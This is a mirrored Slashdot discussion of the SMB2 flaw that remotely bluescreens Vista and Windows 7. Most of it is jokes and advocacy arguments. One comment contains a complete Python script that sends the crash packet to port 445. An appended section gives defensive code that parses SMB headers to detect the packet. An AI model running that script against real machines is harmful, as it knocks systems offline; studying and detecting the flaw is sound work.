Slashdot Mirror


Windows 7 Reintroduces Remote BSoD

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."

14 of 427 comments

  1. Local? by MindStalker · · Score: 5, Interesting

    If it relies on an SMB2 request it is most likely restricted to requests from inside the LAN.
    Either way, still bad.

    1. Re:Local? by poetmatt · · Score: 5, Funny

      well, now I know how to win any lan party contests :)

    2. Re:Local? by GameMaster · · Score: 5, Funny

      NOBODY EXPECTS ATTACKS FROM INSIDE YOUR LAN!!!! Their chief weapon is surprise...surprise and fear...fear and surprise.... Their two weapons are fear and surprise...and ruthless efficiency.... Their *three* weapons are fear, surprise, and ruthless efficiency...and an almost fanatical devotion to rms.... Their *four*...no... *Amongst* their weapons.... Amongst their weaponry...are such elements as fear, surprise.... I'll come in again.

      --

      Rules of Conduct:
      #1 - The DM is always right.
      #2 - If the DM is wrong, see rule #1
  2. I knew Windows 7 was too good to be true by commodore64_love · · Score: 5, Funny

    - Shiny-new interface.
    - No annoying "are you sure" popups every 30 seconds like Vista.
    - Can run on a 1 gigabyte machine without slowing to a crawl.

    It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.

    --
    "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
  3. Not consistent by james_a_craig · · Score: 5, Interesting

    Having actually tried this on three Windows 7 machines now, it doesn't seem to work on every machine. (Actually, it has yet to work on any here, although I hear tell that it does work on some.) There's something more to this than just "that data crashes it every time".

    1. Re:Not consistent by Lulfas · · Score: 5, Informative

      It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.

  4. Correction! by David+Gerard · · Score: 5, Informative

    I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

    And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

    --
    http://rocknerd.co.uk
  5. Ahh, nice to see ... by UncHellMatt · · Score: 5, Funny

    ...that my fellow Boston Public School graduates are writing for seclists.org.

    Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "

    Yes, because we been done had seen that explot in the pasts.

    Dear $DEITY, are there no proof readers or editors alive on these sites?

  6. Please grow up, you're driving us away by Anonymous Coward · · Score: 5, Insightful

    Hi. I'm an adult. I work as a software engineer.

    I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

    I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

    If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.

    1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.

    2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.

    3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.

    4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

    1. Re:Please grow up, you're driving us away by Anonymous Coward · · Score: 5, Insightful

      The pubertal masses of Slashdot != The Linux community

    2. Re:Please grow up, you're driving us away by Ash-Fox · · Score: 5, Informative

      I cannot join in with the Linux community because of you people.

      I'm sorry, Sir. This is not the Linux community, this is the Slashdot community.

      If you want the Linux community, go to http://www.kernel.org/

      I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

      If you look on kernel.org, there is none of this garbage. You are mistaken.

      --
      Change is certain; progress is not obligatory.
  7. For all who want a more technical summary of TFA: by Seth+Kriticos · · Score: 5, Informative

    Vulnerable systems are all those with SMB2 drivers: Vista, W7 and probably Server 2008

    The exploit (which is actually ridiculously simple) goes as follows:

    #!/usr/bin/python
    # When SMB2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
    # PAGE_FAULT_IN_NONPAGED_AREA
    from socket import socket
    from time import sleep

    host = "IP_ADDR", 445
    buff = (
    "\x00\x00\x00\x90" # Begin SMB header: Session message
    "\xff\x53\x4d\x42" # Server Component: SMB
    "\x72\x00\x00\x00" # Negotiate Protocol
    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
    "\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

    Current solution to the problem: disable the SMB protocol on your infrastructure.

    Now please excuse me, I have to go and play a bit with our network admin.. /joke
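For anyone who would rather detect this on the wire than reproduce it, here is an added example (not from the comment above, the advisory, or Microsoft) that parses the NetBIOS session header and the 32-byte SMB1 header of a Negotiate Protocol request and flags a non-zero Process ID High field, which is the one thing the posted packet changes from a normal client request. The field layout follows the SMB1 header (command, status, flags, flags2, PidHigh, signature, reserved, TID, PidLow, UID, MID); the builder and the dialect strings are constructed test input, not captured traffic.

```python
import struct

NETBIOS_SESSION_MESSAGE = 0x00
SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# SMB1 header after the 4-byte magic: Command, NT Status, Flags, Flags2, PidHigh,
# 8-byte signature, 2 reserved, TID, PidLow, UID, MID (all little-endian, 28 bytes)
_HDR_FMT = "<BIBHH8x2xHHHH"

def parse_smb1_header(pkt: bytes) -> dict:
    """Decode NetBIOS session header + SMB1 header; raise ValueError if not SMB1."""
    if len(pkt) < 36:
        raise ValueError("too short for NetBIOS + SMB1 header")
    if pkt[0] != NETBIOS_SESSION_MESSAGE:
        raise ValueError("not a NetBIOS session message")
    nb_len = int.from_bytes(pkt[1:4], "big")
    hdr = pkt[4:36]
    if hdr[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 header")
    cmd, status, flags, flags2, pid_high, tid, pid_low, uid, mid = struct.unpack(_HDR_FMT, hdr[4:])
    return {"nb_len": nb_len, "command": cmd, "status": status, "flags": flags,
            "flags2": flags2, "pid_high": pid_high, "tid": tid, "pid_low": pid_low,
            "uid": uid, "mid": mid, "body": pkt[36:]}

def negotiate_dialects(body: bytes) -> list:
    """Dialect strings from a Negotiate body: WordCount, words, ByteCount, then 0x02-prefixed NUL-terminated names."""
    if len(body) < 3:
        return []
    word_count = body[0]
    byte_count = struct.unpack_from("<H", body, 1 + 2 * word_count)[0]
    data = body[3 + 2 * word_count: 3 + 2 * word_count + byte_count]
    return [d[1:].decode("ascii", "replace") for d in data.split(b"\x00") if d.startswith(b"\x02")]

def check_negotiate(pkt: bytes) -> list:
    """Return findings for a Negotiate request; an empty list means nothing unusual was seen."""
    findings = []
    h = parse_smb1_header(pkt)
    if h["command"] != SMB_COM_NEGOTIATE:
        return findings
    if h["pid_high"] != 0:  # clients send 0 here; the crash packet on this page does not
        findings.append("PidHigh=0x%04x (expected 0) in Negotiate request" % h["pid_high"])
    if h["nb_len"] != len(pkt) - 4:
        findings.append("NetBIOS length %d != payload length %d" % (h["nb_len"], len(pkt) - 4))
    return findings

def build_negotiate(pid_high: int, dialects) -> bytes:
    """Constructed sample input for testing the check: a minimal SMB1 Negotiate request."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = b"\x00" + struct.pack("<H", len(data)) + data  # WordCount=0, ByteCount, dialects
    hdr = SMB1_MAGIC + struct.pack(_HDR_FMT, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high, 0xFFFF, 0xFEFF, 0, 0)
    return b"\x00" + (len(hdr) + len(body)).to_bytes(3, "big") + hdr + body
```

The same check can be run over each TCP/445 session's first client message from a pcap; an IDS rule matching a non-zero PidHigh in SMB_COM_NEGOTIATE is the equivalent signature.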

  8. Re:"RE"-introducing? by David+Gerard · · Score: 5, Funny

    Yeah, reading error on my part. Sorry about that. Let's give Vista credit where it's due!

    --
    http://rocknerd.co.uk
  9. Re:"RE"-introducing? by David+Gerard · · Score: 5, Funny

    But Macs cost too much, and Linux is too hard. And Microsoft only hits me because he loves me.

    --
    http://rocknerd.co.uk